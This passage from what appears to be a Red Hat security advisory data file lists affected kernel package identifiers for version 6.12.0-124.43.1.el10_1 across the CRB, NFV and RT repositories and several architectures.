"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"CRB-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"NFV-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-abi-stablelists-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debug-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-debuginfo-common-aarch64-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-debuginfo-common-ppc64le-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-debuginfo-common-s390x-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-debuginfo-common-x86_64-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-devel-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-doc-0:6.12.0-124.43.1.el10_1.noarch",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-modules-extra-matched-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-64k-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debug-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-core-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-rt-modules-extra-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-tools-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:kernel-tools-libs-devel-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:kernel-uki-virt-addons-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:kernel-zfcpdump-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-devel-matched-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-core-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:kernel-zfcpdump-modules-extra-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:libperf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:python3-perf-debuginfo-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rtla-0:6.12.0-124.43.1.el10_1.x86_64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.aarch64",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.ppc64le",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.s390x",
"NFV-10.1.Z:rv-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.ppc64le",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.s390x",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.src",
"RT-10.1.Z:kernel-0:6.12.0-124.43.1.el10_1.x86_64",
"RT-10.1.Z:kernel-64k-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-devel-matched-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-core-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debug-modules-extra-0:6.12.0-124.43.1.el10_1.aarch64",
"RT-10.1.Z:kernel-64k-debuginfo-0:6.12.0-124.43.1.el10_1.aarch64",
